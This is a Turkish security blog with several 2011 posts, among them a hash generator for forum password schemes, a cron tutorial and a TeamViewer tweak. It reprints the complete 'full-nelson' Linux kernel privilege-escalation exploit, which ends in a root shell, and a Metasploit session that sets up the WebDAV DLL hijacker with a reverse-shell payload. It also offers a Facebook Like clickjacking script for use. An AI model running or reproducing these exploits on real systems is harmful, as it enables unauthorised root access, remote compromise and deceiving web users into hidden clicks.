Bu konu ile askerdeki arkadaşım Dr.Ly0n'un kulaklarını çınlatmak istiyorum. Hepimiz efsanelerin gerçek dışı olduğunu biliriz . Örneğin elektirikten sorumlu devlet bakalı zeus yunan mitolojisinde bir evsanedir :) . Yada kaf dağının ardındaki altın kuş . . . Efsaneler çoğaltılabilir . Ancak ben internet ortamında yıllardan beridir dolaşan başka bir efsaneden bahsetmek istiyorum " vBulletin Hash'ı Kırılamaz " bosversene. . . Teoriler çürütmek içindir. Kardeşim Dr.Ly0n askere gitmeden önceki zamanlarda yine neden işsisiz diye düşünürken süre gelen efsane ile ilgili konu açıldı . Tembelliğimdenmi desem o zamana kadar merak etmeyişimdenmi desem yoksa vBulletin'i hiç kullanmadığım içinmi desem.

Hashının kombinasyonu hakkında bilgi sahibi değildim ( sadece kuvetli olduğunu ve bugüne kadar kırmak için hiç çaba sarf etmediğimi biliyorum ) .Doktor kardesimin bilgilendirmesi sorasında o hashın basit bir logaritma ile şifrelendiğini gördüm.

vBulletin kullanıcı hashı vBulletin üyelerinin bulunduğu tabloda salt bir değer ile ilişkilendirilerek oluşuyor. Basit bir döngü ile anlatmaya çalışırsak

<?php
###########################
#     VB KOMBİNASYONU     #
#    Dr.Ly0n & FreWaL     #
###########################
// Değişken Salt ve Pass birleşiminden oluşuyor.


$salt = "nxo";
$sifre = "654785";
echo  md5(md5($sifre).$salt);


?>

Burda dikkat edilmesi gereken kısım " md5(md5($sifre).$salt); " burasıdır.

şifre değerini md5 e çevirdikten sora salt değer ile birleştirerek bir daha md5 e çeviriyor. Böylece Sözde kırılamaz hash ortaya çıkıyor ( külli yalan )
Zira hash ve salt değerlere göre tarama yapabilen çok güzel md5 kırıcılar mevcut.

Neyse üzerinde fazla durmak istemiyorum . Çoğu zaman local ortamda hazır scriptler üzerinde incelemeler yaparken ( secretlerine çomak sokmaya çalışırken )
logaritmasını bilmediğimiz scriptlerin passlarını oluşturmakta güçlük çekeriz.Kullanım alanı kişiden kişiye değişir.Bende ona kolaylık olsun diye yazdığım ufak bir döngüyü yayınlamak istiyorum.

<?php

###########################
#  Salla Salla Vur Duvara #
#    Dr.Ly0n & FreWaL     #
###########################

$x = $_GET["x"];
$sifrex = base64_encode($_GET["sifre"]);
$saltx = base64_encode($_GET["saltyadauye"]);


echo '

<form method="GET" action="?">
  <p>
  Şifre</p>
  <p><input type="text" name="sifre" size="52"></p>
  <p>Salt değer ( Smfde Kullanıcı ismi Yazılacaktır )</p>
  <p><input type="text" name="saltyadauye" size="52"></p>
  <p><input type="radio" value="1" checked name="x">vBulettin
  <input type="radio" value="2" name="x">Smf
  <input type="radio" value="3" name="x">whmCs</p>
  <p><input type="submit" value="Gonder" name="Geliyore"></p>
</form>

';



if($x=="1"){

$hashx =  md5(md5(base64_decode($sifrex)).base64_decode($saltx));
echo '<br> vBulettin Hash : <br>'.$hashx;

}else{


}

/////////////////////

if($x=="2"){

echo '2';

$hashx = sha1(strtolower(base64_decode($saltx)) . base64_decode($sifrex));


echo $hashx;

}else{


}

/////////////////////

if($x=="3"){

$hashx = md5(base64_decode($saltx) . base64_decode($sifrex)) . ":" . base64_decode($saltx);
echo '<br> WHMCS Şifresi : <br>'.$hashx;

}else{


}
?>

Bu döküman FreWaL tarafından yazılmıştır.

Webdav Dll hijacker Güvenlik Açığı

2011-05-23T09:38:00.000-07:00

Bu güvenlik açığına dair exploit geçtiğimiz aylarda microsoftun tüm çırpınışlarına rağmen exploit-db de yayınlandı.Öncelikle sizlere terimleri açıklayım.

Webdav (Web Klasörü) , Dll ( Dynamic Link Library ) , hijacker ingilizcede hırsız olarak geçer ancak burada (Browser Hırsızlığı) olarak anlam kazanıyor.

Güvenlik açığı basit bir dll infected işlemi ile gerçekleşiyor. Hedef makinedeki yazılımlara göre oluşturulan belgeler , kurbanın önüne açılan web klasöründe sergileniyor. Kurbanın dosyalardan herhangi birini açması ile dll kendini tetikliyor ve makineye infect oluyor , o andan sonra saldırgan makine bağlantıyı alıyor.

işlem local yada remote yapılabiliyor.
Güvenlik açığından etkilenen browserler : ie6, ie7, ie8, mozilla 3.5, opera 9

Örnek saldırı :

msf : use windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) : set LHOST 192.168.1.3
LHOST=192.168.1.3
msf exploit(webdav_dll_hijacker) : set LPORT 8888 
msf exploit(webdav_dll_hijacker) : set payloads windows/shell/reverse_tcp
payloads => windows/shell/reverse_tcp
msf exploit(webdav_dll_hijacker) : set EXTENSIONS "doc txt docx html"
EXTENSIONS => doc txt docx html
msf exploit(webdav_dll_hijacker) : exploit

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.3:8888 msf exploit(webdav_dll_hijacker)
[*] 
[*] Exploit links are now available at \\192.168.1.3\documents\
[*] 
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.3:80/
[*] Server started.
msf exploit(webdav_dll_hijacker) :

Sonrasını görüntüler açıklıyor ;

Bu döküman FreWaL tarafından güvenlik amacı ile yazılmıştır.

TeamViewer must not be executed as root! Hatası ve Çözümü

2011-05-21T06:00:00.000-07:00

Tw ekibinin uzak yardım aracı olarak yazdığı programı bilirsiniz . Çoğu şirketin vazgeçilmezi haline geldiği dönemlerde yaşıyoruz . Bu gün teamvieweri bt5 e kurdum ancak aktif etmeye çalıştığım zaman çok ufak bir hata ile karşılaştım.Hiç bilmeyen arkadaşlara yararı olur diye bu dökümanı yazıyorum. Bilen zaten biliyordur.

_
" root@bt:~/Desktop/teamviewer/teamviewer6# ./teamviewer 

TeamViewer must not be executed as root! "

Artık buna bash script hatasımı desem saçmalıkmı desem bilmiyorum gerçi sorun demeye şahit lazım yinede bilmeyen arkadaşlar guugılda aratırda bulamaz diye bu dökümanı yazıyorum.. Basit bir yol mevcut .

Herhangi bir editor ile teamviewer dosyasını açın. üst kısımda ;

Orjinal KOD :

if [ $userid = 0 ]
then
        echo TeamViewer must not be executed as root!
        exit 1
fi

Şöyle bir koda rastlayacaksınız . Bu şarta bağlanmış bir açılışı ifade ediyor.
userid 0 ise kendini açma gibisinden saçma sapan bir kod eklenmiş. yani uid değiştirildiği zaman program açılacaktır.
UID değiştirilmiş kod örneği :

if [ $userid = 66666 ]
then
        echo TeamViewer must not be executed as root!
        exit 1
fi

Gibisinden bir değişiklik ile programın açılmasını sağlayabilirsiniz yada dilerseniz kod kısmında verdiğim alanı tamamen silerekde programın çalışmasını sağlayabilirsiniz.

Kolay gelsin .

Bu Döküman FreWaL Tarafından yazılmıştır.

Av Zamanı ( isyanlardayım )

2011-05-19T10:00:00.000-07:00

Detaya girmek istemiyorum Zira başımı ağırtmak istemiyorum. İşlerim dolayısı ile
şehir dışındayım , bir arkadasa verdiğim sözü tutabilmek için internete ihtiyacım vardı . Avea nın kampanyası ile
tahaütsüz jet modem aldım . Ancak google bile 15 dakikada açılıyordu. Jet modemde farklı hat kullanma yasağı mevcut yani farklı bir hat kullanabilmek için imei ye göre sim kilit kodu talebinde bulunuyorsunuz. Bende o talepte bulundum 5. ayın 1 inde bulunduğum talep üzerine 18 gün geçmesine rağmen geri dönüş yapılmadı .
Doğal olarak isyan ettim . Kısa bir analizden sonra sim lock kodunu kırmayı başardım . Yalnız bu işlemi nasıl yaptığım hakkında hiç bir şekilde bilgi vermeyeceğim. Çünkü modemi tahaütlü alanlar 1 seneden önce simlock kodunu talep edemiyor.

Siz siz olun jet modemi oly ile analiz etmeyin şifre falan avlamaya çalışmayın . bu arada aveanın zta ile ortak çalıştığınıda söylemek istemiyorum :) .

Burdan aveaya sesleniyorum
Siz halen sim lock kodunu göndereceksizniz. atı alan fizanı geçti.
:)
DİP NOT : Yandaki resimi sadece göstermelik olsun diye çektim çektim .hata mesajına göre text lerde gerekli yeri arayıp kodlarda karşılaştırma sağlayan bir yer sakın aramayın . O zaman şifreyi bulacağınızı söylemek istemiyorum.Assemblyden hiç çakmıyorsanız denemeyin bile. Ayrıca 5 hatalı giriş yaparsanız modemin bloke olacağını unutmayın.

Cron işlemleri

2011-05-19T04:00:00.000-07:00

Cron Linux / Unix sistemlerde zamanlanmış görevleri ifade eder. Bu konu hakkında döküman çok ancak
(ç)Alıntı olmasından kaynaklı anlatımlarda hatalar çok fazla . Detaya girmek istemiyorum.
Cron Girdilerini editleme ( ekleme/çıkarma/düzenleme ) için : crontab -e
Cron Girdilerini Listeleme : crontab -l
Bütün Cron Girdilerini Siler : crontab -r

Normal şartlarda crontab'ı editlemeye çalışırsanız kendisini öntanımlı text editoru olan vi ile açmaya çalışacaktır. vi benim pek tutmadığım bir editor o yüzden ön tanımlı editörü nano yapmanızda fayda var diyorum. Yapmasını bilmeyen arkadaşlar için export EDITOR=nano komutunu uygulamak yeterli olacaktır .
Yine ben vi kullanmak istiyorum diyen arkadaşlar için ;
crontab -e dedikten sonra i tuşuna basarak insert moduna geçebilirsiniz. Daha sonra eklemek istediğiniz komutu yazıp 1 kere esc basmanız yeterli olacaktır . böylece insert modulunden çıkmış olacaksınız. değişiklikleri kaydetmek için shift + z yi kullanmanız gerekecek.

Yazacağım yazı acemilere yönelik olacağı için command not found gibisinden bir uyarı ile karşılaşırsanız . ( nano kullanmak istiyorum diyenler için söylüyorum ) Kullandığınız sisteme göre komutu kurunuz .

Hemen Konumuza geri dönelim.

* * * * * sh /root/script.sh yada * * * * * reboot ' iki farklı örnek burada * ile gördükleriniz zamanı temsil ederken sonrasında gelen yazı komutu temsil etmektedir.

daha açıklayıcı olmaya çalışırsak ;

________________ Dakika (0 - 59)

|   _____________ Saat (0 - 23)

|  |   __________ Ayın Günleri (1 - 31)

|  |  |   _______ Ay (1 - 12)

|  |  |  |   ____ Haftanın Günleri (0 - 6) (Pazar=0 ya da 7)

|  |  |  |  |

*  *  *  *  *  Komut

Örnekler ile pekiştirmeye çalışalım :

30 Dakikada Bir Çalışacak Cron Girdisi



*/30 * * * * reboot ' her 30 dakikada bir makineye reboot atacaktır.

Her öğlenden sora 13 ve akşam 21 ′de Çalışacak ve makineye reboot atacak Cron Girdisi

00 12,21 * * * reboot

Sabah 5 Akşam 24 Arasında Saat başı  Çalışacak ve makineye reboot atacak Cron Girdisi

00 05-24 * * * reboot

Haftanın günlerinden 3. gün ve 6. gün ( çarşamba ve cumartesi ) Sabah 5 Akşam 24 Arasında her Saat başı Çalışacak ve makineye reboot atacak Cron Girdisi

00 05-24 * * 3-6 reboot

Crontab Haftanın Günleri :

pazar : 0, pazartesi  : 1, salı : 2, çarşamba : 3, perşembe : 4, cuma : 5, cumartesi : 6

Bu Döküman FreWaL Tarafından yazılmıştır.

BackTrack 5 Çıktı.

2011-05-18T07:42:00.000-07:00

Vazgeçilmezim BackTrack ile Üniversite yıllarımda 2007 - 2008 sezonunda bedava internet arayışında iken tanıştık , ancak mükemelliğinin farkına vardıktan sora bırakamaz oldum. sürüm 2 den bu yanadır kullanmaktayım . 5 Sürümünde remote exploit grubu kendini iyice aşmış ( Diyebilirim. )
Daha önceleri KDE olarak sunulan backtrack , 5 sürümünde KDE 4.6 yada gnome 2.6 ( masaüstü ortamı ) şeklinde seçenekler sunmuş . Sisteminize göre 32 yada 64 bit olarak indirebilirsiniz .

BACKTRACK İNDİR

Linux Kernel Local Address Limit Override Security Weakness

2011-05-18T07:12:00.000-07:00

Security Focus Güvenlik ekibinin bildirimine göre Linux 2.6.x sürümlerinde bir güvenlik zaafiyeti bulunuyor. Exploitin referans kısmına bakıldığı zaman ;

* resides in valid userspace by invoking access_ok().  However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.

Şeklinde bir yazı gözümüze çarpıyor ; set_fs() fonksiyonu işlevini yerine

getirmeye çalışırken access_ok() fonksiyonu oyun bozanlık yapıyor ve işlevini

doğru bir şekilde gerçekleştiremiyor . Sunucuya yapılacak Local saldırılarda

Tabiri caiz ise ( root denemelerinde ) user yetkisi roota çekilebiliyor.

Buda sunucu sahiplerini zor duruma düşürebiliyor .

Exploiti aşağıda vermiş olduğum URL den kontrol edebilirsiniz.

Orjinal Link : http://downloads.securityfocus.com/vulnerabilities/exploits/full-nelson.c

/*
 * Linux Kernel <= 2.6.37 local privilege escalation
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc full-nelson.c -o full-nelson
 * ./full-nelson
 *
 * This exploit leverages three vulnerabilities to get root, all of which were
 * discovered by Nelson Elhage:
 *
 * CVE-2010-4258
 * -------------
 * This is the interesting one, and the reason I wrote this exploit.  If a
 * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
 * word will be written to a user-specified pointer when that thread exits.
 * This write is done using put_user(), which ensures the provided destination
 * resides in valid userspace by invoking access_ok().  However, Nelson
 * discovered that when the kernel performs an address limit override via
 * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
 * etc.), this override is not reverted before calling put_user() in the exit
 * path, allowing a user to write a NULL word to an arbitrary kernel address.
 * Note that this issue requires an additional vulnerability to trigger.
 *
 * CVE-2010-3849
 * -------------
 * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
 * fairly benign as a local denial-of-service.  It's a perfect candidate to
 * trigger the above issue, since it's reachable via sock_no_sendpage(), which
 * subsequently calls sendmsg under KERNEL_DS.
 *
 * CVE-2010-3850
 * -------------
 * I wouldn't be able to reach the NULL pointer dereference and trigger the
 * OOPS if users weren't able to assign Econet addresses to arbitrary
 * interfaces due to a missing capabilities check.
 *
 * In the interest of public safety, this exploit was specifically designed to
 * be limited:
 *
 *  * The particular symbols I resolve are not exported on Slackware or Debian
 *  * Red Hat does not support Econet by default
 *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
 *    Debian
 *
 * However, the important issue, CVE-2010-4258, affects everyone, and it would
 * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
 * more sophisticated version of this that doesn't have the roadblocks I put in
 * to prevent abuse by script kiddies.
 *
 * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
 *
 * NOTE: the exploit process will deadlock and stay in a zombie state after you
 * exit your root shell because the Econet thread OOPSes while holding the
 * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
 *
 * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* How many bytes should we clear in our
 * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[512];
        struct utsname ver;
        int ret;
        int rep = 0;
        int oldstyle = 0;

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL)
                        goto fallback;
                oldstyle = 1;
        }

repeat:
        ret = 0;
        while(ret != EOF) {
                if (!oldstyle)
                        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
                else {
                        ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
                        if (ret == 2) {
                                char *p;
                                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                                        continue;
                                p = strrchr(sname, '_');
                                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                                        p = p - 4;
                                        while (p > (char *)sname && *(p - 1) == '_')
                                                p--;
                                        *p = '\0';
                                }
                        }
                }
                if (ret == 0) {
                        fscanf(f, "%s\n", sname);
                        continue;
                }
                if (!strcmp(name, sname)) {
                        fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        if (rep)
                return 0;
fallback:
        uname(&ver);
        if (strncmp(ver.release, "2.6", 3))
                oldstyle = 1;
        sprintf(sname, "/boot/System.map-%s", ver.release);
        f = fopen(sname, "r");
        if (f == NULL)
                return 0;
        rep = 1;
        goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

        commit_creds(prepare_kernel_cred(0));
        return -1;

}

/* Why do I do this?  Because on x86-64, the address of
 * commit_creds and prepare_kernel_cred are loaded relative
 * to rip, which means I can't just copy the above payload
 * into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{

#ifdef __x86_64__
        asm("mov $getroot, %rax; call *%rax;");
#else
        asm("mov $getroot, %eax; call *%eax;");
#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg
 * via sock_no_sendpage, so it's under KERNEL_DS */
int trigger(int * fildes)
{
        int ret;
        struct ifreq ifr;

        memset(&ifr, 0, sizeof(ifr));
        strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

        ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

        if(ret < 0) {
                printf("[*] Failed to set Econet address.\n");
                return -1;
        }

        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
        splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

        /* Shouldn't get here... */
        exit(0);
}

int main(int argc, char * argv[])
{
        unsigned long econet_ops, econet_ioctl, target, landing;
        int fildes[4], pid;
        void * newstack, * payload;

        /* Create file descriptors now so there are two
           references to them after cloning...otherwise
           the child will never return because it
           deadlocks when trying to unlock various
           mutexes after OOPSing */
        pipe(fildes);
        fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
        fildes[3] = open("/dev/zero", O_RDONLY);

        if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
                printf("[*] Failed to open file descriptors.\n");
                return -1;
        }

        /* Resolve addresses of relevant symbols */
        printf("[*] Resolving kernel addresses...\n");
        econet_ioctl = get_kernel_sym("econet_ioctl");
        econet_ops = get_kernel_sym("econet_ops");
        commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
        prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

        if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
                printf("[*] Failed to resolve kernel symbols.\n");
                return -1;
        }

        if(!(newstack = malloc(65536))) {
                printf("[*] Failed to allocate memory.\n");
                return -1;
        }

        printf("[*] Calculating target...\n");
        target = econet_ops + 10 * sizeof(void *) - OFFSET;

        /* Clear the higher bits */
        landing = econet_ioctl << SHIFT >> SHIFT;

        payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
                       PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

        if ((long)payload == -1) {
                printf("[*] Failed to mmap() at target address.\n");
                return -1;
        }

        memcpy((void *)landing, &trampoline, 1024);

        clone((int (*)(void *))trigger,
              (void *)((unsigned long)newstack + 65536),
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
              &fildes, NULL, NULL, target);

        sleep(1);

        printf("[*] Triggering payload...\n");
        ioctl(fildes[2], 0, NULL);

        if(getuid()) {
                printf("[*] Exploit failed to get root.\n");
                return -1;
        }

        printf("[*] Got root!\n");
        execl("/bin/sh", "/bin/sh", NULL);
}

Bu yazı FreWaL Tarafından yazılmıştır.

Hiç Yazasım yok

2011-05-17T02:47:00.000-07:00

Eskiden olsa Blogu sırf bilinmeyenlerle doldururdum. Ama gelin görünki hiç yazasım yok . Zira geçmiş senelerde sırf yayınladığım videolar ve kendime has yazılımlarım ile blogum ön plana çıkmıştı . Çünkü hiç bilinmeyen yöntemleri görsel anlatımlarla okuyucu arkadaslarımıza öretiyorduk . Kullanıcıların işlerini kolaylaştıracak yazılımlarım ile de pc üzerindeki bazı işlerin pratikliğini arttırıyorduk. Şuan bakıyorumda internet ortamı büyük bir tiyatro gibi içersinde bi sürü palyaço şaklabanlık yapıyor ( sözüm ona kimse üzerine alınmasın çakma hekırlardan bahsediyorum ) neyseki bizim hek hukla işimiz yok . Ayrıca bloguda yeni açtım bilen yok . Nasılsa yakında google amca nike göre üst sıralara çekmeye baslar . Ama blogumda sırf damar takılmaya kararlıyım desem yeridir .

Mobile ile bloga yamak ayrıca zor oluyor belirtmem gerek :).

İlerde bir gün (melankolik) takılmadığım bir önemde görüşmek dileği ile.

Facebook Like Bug ( Clickjacking )

2011-05-15T11:20:00.000-07:00

Çok uzun zamandır takip ettiğim bir dil ajax . Geçmiş seneleri bilenler bilir 2005 yılında googlenin suggest hizmeti ile kendini topluma tanıtmış bir dil olarak biliniyor. İnceliklerine bakıldığı zaman Çok muhteşem bir dil . Her ne kadar coderlerin işine yarasada kötü amaçlarada hizmet etmiyor değil . Zira gelişmişlik açısından ciddi manada şaşırta bilen bir yapıya sahip .
Clickjacking güvenlik açığı geçtiğimiz yıllarda ortaya ilk atıldığı zamanlarda hakkında epey bi döküman okumuştum . ( Merak meselesi )
Eric Kerr adında bir arkadaş ajaxın nimetlerini kullanarak facebook kullanıcısının oturumunun aktif olduğu browserlerde şahsa grupları arka planda beyendirtmeyi başarmış. Ancak kodlarda ufak bir yer gözüme çarptı

if (!IE) document.captureEvents(Event.MOUSEMOVE);

Arkadaş şart koşmuş ve demişki Browser internet explorer dışında bir browser ise bu işlemi yap değil ise dön git köyüne.Anlayacağınız IE de çalışmıyor. Daha inceleme fırsatı bulamadım kullanmak isteyen olursa diye yayınlıyorum http://erickerr.com/like-clickjacking yine elemanın kendi sitesinden inceleyebilirsiniz.

http://erickerr.com/misc/like-clickjacking.js

(function(){
  var tempX = 0,
  tempY = 0,
  IE = document.all ? true : false;
  
  if (!IE) document.captureEvents(Event.MOUSEMOVE);
  
  var like = document.createElement('iframe');
  like.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://erickerr.com/like-clickjacking') + '&layout=standard&show_faces=true&width=53&action=like&colorscheme=light&height=80';
  like.scrolling = 'no';
  like.frameBorder = 0;
  like.allowTransparency = 'true';
  like.style.border = 0;
  like.style.overflow = 'hidden';
  like.style.cursor = 'pointer';
  like.style.width = '53px';
  like.style.height =  '23px';
  like.style.position = 'absolute';
  like.style.opacity = .8; //Would be 0 if really used
  document.getElementsByTagName('body')[0].appendChild(like);
  
  window.addEventListener('mousemove', mouseMove, false);
  
  setTimeout(function(){
    document.getElementsByTagName('body')[0].removeChild(like);
    window.removeEventListener('mousemove', mouseMove, false);
  }, 10000);
  
  function mouseMove(e) {
    if (IE) {
      tempX = event.clientX + document.body.scrollLeft;
      tempY = event.clientY + document.body.scrollTop;
    } else {
      tempX = e.pageX;
      tempY = e.pageY;
    }
    
    if (tempX < 0) tempX = 0;
    if (tempY < 0) tempY = 0;
    
    like.style.top = (tempY - 8) + 'px';
    like.style.left = (tempX - 25) + 'px';
    
    return true
  }
})();

Farklı sitelerdeki FreWaL Üyelikleri ile alakalı

2011-05-15T10:42:00.000-07:00

Geçtiğimiz günlerde googlede arama yaparken çakmalarıma rastladım o yüzden bu açıklamayı yapma gereği duyuyorum . IMHATIMI.ORG ve 1 , 2 dostum dışındaki hiç bir sitede üyeliğim bulunmamaktadır. Bir kaç sitede Adıma açılan saçma sapan 3 site hekid 1 site çekid konuları ile ağım bağım bulunmamaktadır .

Taklitlerden sakınmak lazım.

Bloglama zamanı gelmiş geçiyor ...

2011-05-15T05:05:00.000-07:00

Malumunuzda daha önceden frewal.net üzerinden bloglama işlemi yapıyordum Gelin görünki 2007 , 2008 den sora bloglamaya ara verdim . 2009 sonlarında frewal.net i bir daha aktif ettim 6 ay sora sıkılıp kapadım . O zamandan bana kalan http://web.archive.org/*/http://www.frewal.net sadece bu oldu. Şimdi yeni nesil blogger açalım dedik dursun bir köşede estikçe kafama karalarım bişiler :) . Selametle.